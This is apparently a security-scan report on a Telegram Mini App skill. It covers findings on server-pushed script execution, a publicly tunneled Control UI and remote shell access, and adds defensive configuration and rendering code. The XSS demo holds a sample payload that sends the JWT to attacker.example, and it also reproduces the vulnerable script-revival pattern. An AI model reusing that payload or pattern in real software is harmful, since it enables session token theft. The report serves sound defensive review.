TG Canvas Mini App

Security checks across malware telemetry and agentic risk

Overview

The skill is mostly transparent about its powerful features, but it needs review because server-pushed web content can run scripts inside the same Telegram Mini App WebView that exposes the server shell and Control UI features.

Install only on an isolated machine or container you are willing to expose to the trusted Telegram users listed in ALLOWED_USER_IDS. Keep ALLOWED_USER_IDS very narrow, use long random BOT_TOKEN/JWT_SECRET/PUSH_TOKEN values, do not run the server as root, prefer markdown/text over untrusted HTML, and do not expose the Control UI through a tunnel unless a separate strong authentication layer sits in front of it.
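One way to enforce that deployment advice at startup, as an added example that is not the skill's own code: it reads the variables the skill documents (ALLOWED_USER_IDS, BOT_TOKEN, JWT_SECRET, PUSH_TOKEN), rejects malformed or oversized allowlists, rejects short or low-entropy secrets, and refuses to run as root. The length floor, the entropy floor and the allowlist cap are assumptions chosen here, not values the project specifies.

```javascript
// Added example (not the skill's code): fail-closed startup guard for the
// environment variables the skill documents. All thresholds are assumptions.
const MAX_ALLOWED_USERS = 5;        // assumed cap for "very narrow"
const MIN_SECRET_LENGTH = 32;       // assumed minimum length for JWT_SECRET/PUSH_TOKEN
const MIN_ENTROPY_PER_CHAR = 3.5;   // assumed floor; "passwordpassword..." scores 3.0

// Telegram user ids are positive integers; keep them as strings so values
// beyond 2^53 are not silently rounded. Wildcards and blanks are rejected.
function parseAllowedUserIds(raw) {
  const ids = new Set();
  for (const part of String(raw ?? '').split(',')) {
    const s = part.trim();
    if (!s) continue;
    if (!/^[1-9]\d{0,18}$/.test(s)) throw new Error(`ALLOWED_USER_IDS: "${s}" is not a Telegram user id`);
    ids.add(s);
  }
  if (ids.size === 0) throw new Error('ALLOWED_USER_IDS must list at least one user');
  if (ids.size > MAX_ALLOWED_USERS) throw new Error(`ALLOWED_USER_IDS: more than ${MAX_ALLOWED_USERS} shell users`);
  return ids;
}

// Shannon entropy per character catches repeated or dictionary-like secrets
// that pass a pure length check.
function secretIsStrong(value) {
  if (typeof value !== 'string' || value.length < MIN_SECRET_LENGTH) return false;
  const counts = new Map();
  for (const ch of value) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) { const p = n / value.length; h -= p * Math.log2(p); }
  return h >= MIN_ENTROPY_PER_CHAR;
}

// Pure check over an env-like object and a numeric uid; returns every problem
// found so the operator can fix them in one pass.
function checkConfig(env, uid) {
  const problems = [];
  let allowed = new Set();
  try { allowed = parseAllowedUserIds(env.ALLOWED_USER_IDS); } catch (e) { problems.push(e.message); }
  if (!env.BOT_TOKEN) problems.push('BOT_TOKEN is missing');   // issued by Telegram, only presence is checked
  for (const name of ['JWT_SECRET', 'PUSH_TOKEN']) {
    if (!secretIsStrong(env[name])) problems.push(`${name} must be at least ${MIN_SECRET_LENGTH} random characters`);
  }
  if (uid === 0) problems.push('refusing to run as root: the terminal feature would hand out a root shell');
  return { ok: problems.length === 0, problems, allowed };
}

// Call this before binding the bot or the Mini App server.
function enforceStartupPolicy() {
  const uid = typeof process.getuid === 'function' ? process.getuid() : -1;  // -1 on Windows
  const result = checkConfig(process.env, uid);
  if (!result.ok) {
    for (const p of result.problems) console.error('config:', p);
    process.exit(1);
  }
  return result.allowed;
}
```

`enforceStartupPolicy()` exits the process on any problem rather than degrading to a partial configuration; the returned set is what the terminal and push handlers should consult, so the allowlist is parsed in exactly one place.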

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (3)

Intent-Code Divergence

Severity: High
Confidence: 98%
Finding
The client renders server-supplied HTML with innerHTML and then explicitly re-creates embedded <script> tags so they execute in the Telegram Mini App WebView. Because this skill also exposes a JWT-gated terminal and optional control UI, any XSS or malicious server-provided canvas payload can steal tokens, invoke privileged actions, or drive the remote shell/control interface from the victim's session.
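The render pattern this finding describes, beside a sandboxed alternative, as an added example that is not code from the skill or from the scanner. Browsers deliberately do not execute `<script>` elements that arrive via `innerHTML`; the client defeats that by re-creating each script with `createElement`, which does execute. The hardened renderer is an assumed design: text and markdown output go through `textContent`, and HTML is placed in an iframe with an empty `sandbox`, which blocks scripts and gives the content an opaque origin so it cannot read the app's storage or call the terminal/control endpoints as the user. `FakeDocument` is a minimal stand-in for the WebView DOM (it only models `<script>` children) so the block runs under Node; in the Mini App pass the real `document` and container instead.

```javascript
// Added example (not the skill's code). FakeElement/FakeDocument are a DOM
// stand-in for Node; they record which scripts a real browser would have run.
class FakeElement {
  constructor(doc, tag, inert = false) {
    this.ownerDocument = doc; this.tagName = tag.toUpperCase();
    this.inert = inert;           // true for elements produced by innerHTML parsing
    this.attrs = new Map(); this.children = []; this.parent = null;
    this.textContent = ''; this.srcdoc = '';
  }
  setAttribute(n, v) { this.attrs.set(n, String(v)); }
  getAttribute(n) { return this.attrs.has(n) ? this.attrs.get(n) : null; }
  get attributes() { return [...this.attrs].map(([name, value]) => ({ name, value })); }
  appendChild(c) { c.parent = this; this.children.push(c); this.ownerDocument.onInsert(c); return c; }
  replaceChildren() { this.children = []; }
  replaceWith(n) {
    const i = this.parent.children.indexOf(this);
    n.parent = this.parent; this.parent.children[i] = n; this.ownerDocument.onInsert(n);
  }
  querySelectorAll(sel) { return this.children.filter((c) => c.tagName === sel.toUpperCase()); }
  // Like a browser: innerHTML parses <script> tags into inert elements that do not run.
  set innerHTML(html) {
    this.children = [];
    for (const m of html.matchAll(/<script([^>]*)>([\s\S]*?)<\/script>/gi)) {
      const s = new FakeElement(this.ownerDocument, 'script', true);
      for (const a of m[1].matchAll(/([\w-]+)="([^"]*)"/g)) s.setAttribute(a[1], a[2]);
      s.textContent = m[2];
      this.appendChild(s);
    }
  }
}
class FakeDocument {
  constructor() { this.executed = []; }   // bodies of scripts a real browser would execute
  createElement(tag) { return new FakeElement(this, tag); }
  onInsert(el) { if (el.tagName === 'SCRIPT' && !el.inert) this.executed.push(el.textContent); }
}

// Vulnerable pattern from the finding: re-creating each parsed <script> with
// createElement makes the browser execute server-supplied code in the app origin.
function renderCanvasUnsafe(container, html) {
  container.innerHTML = html;
  for (const old of container.querySelectorAll('script')) {
    const live = container.ownerDocument.createElement('script');
    for (const { name, value } of old.attributes) live.setAttribute(name, value);
    live.textContent = old.textContent;
    old.replaceWith(live);
  }
}

// Hardened alternative (assumed design): no script revival; untrusted HTML is
// isolated in an iframe whose empty sandbox forbids scripts and same-origin access.
function renderCanvasSafe(container, payload) {
  container.replaceChildren();
  if (payload.type !== 'html') { container.textContent = String(payload.body); return; }
  const frame = container.ownerDocument.createElement('iframe');
  frame.setAttribute('sandbox', '');
  frame.setAttribute('referrerpolicy', 'no-referrer');
  frame.srcdoc = payload.body;
  container.appendChild(frame);
}

// Constructed sample of a malicious server-pushed canvas payload.
const EVIL_HTML = '<p>chart</p><script type="module">fetch("https://attacker.example/?t=" + localStorage.jwt)</script>';

// Renders EVIL_HTML with one of the two renderers and reports what ran.
function demo(safe) {
  const doc = new FakeDocument();
  const root = doc.createElement('div');
  if (safe) renderCanvasSafe(root, { type: 'html', body: EVIL_HTML });
  else renderCanvasUnsafe(root, EVIL_HTML);
  return { executed: doc.executed.length, children: root.children.map((c) => [c.tagName, c.getAttribute('sandbox')]) };
}
```

`demo(false)` reports one executed script and `demo(true)` none. A Content-Security-Policy on the Mini App page whose `script-src` omits `'unsafe-inline'` would also neutralize the revived inline scripts, but the sandboxed iframe is the change that keeps the canvas out of the app's origin regardless of how the server renders it.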

Context-Inappropriate Capability

Severity: Medium
Confidence: 96%
Finding
This script intentionally exposes a localhost-only OpenClaw Control UI on 127.0.0.1:18789 to a public Cloudflare trycloudflare.com URL without any authentication, IP restriction, or transport-layer access control in the script itself. In the context of this skill, which already mentions a high-privilege server-side terminal and optional Control UI proxy, turning an internal admin/control surface into a publicly reachable endpoint substantially increases attack surface and can enable unauthorized remote access to sensitive control functionality.

Unrestricted Tool Access

Severity: Medium
Category: Excessive Agency
Content (excerpt from the skill's documentation)
The Mini App includes an interactive terminal backed by a server-side PTY.

> ⚠️ **This grants shell access to the machine running the server**, as the process user. Anyone in `ALLOWED_USER_IDS` can open a bash session and run arbitrary commands. Only add users you trust with shell access to `ALLOWED_USER_IDS`.

**How it works:**
- Authenticated users see a **Terminal** button in the Mini App topbar.
Confidence: 98%
Finding: matched text "run arbitrary commands"

VirusTotal

66/66 vendors reported this skill as clean (no detections). A clean VirusTotal result only means the package matched no known malware signatures; it does not address the design-level issues in the findings above.

View on VirusTotal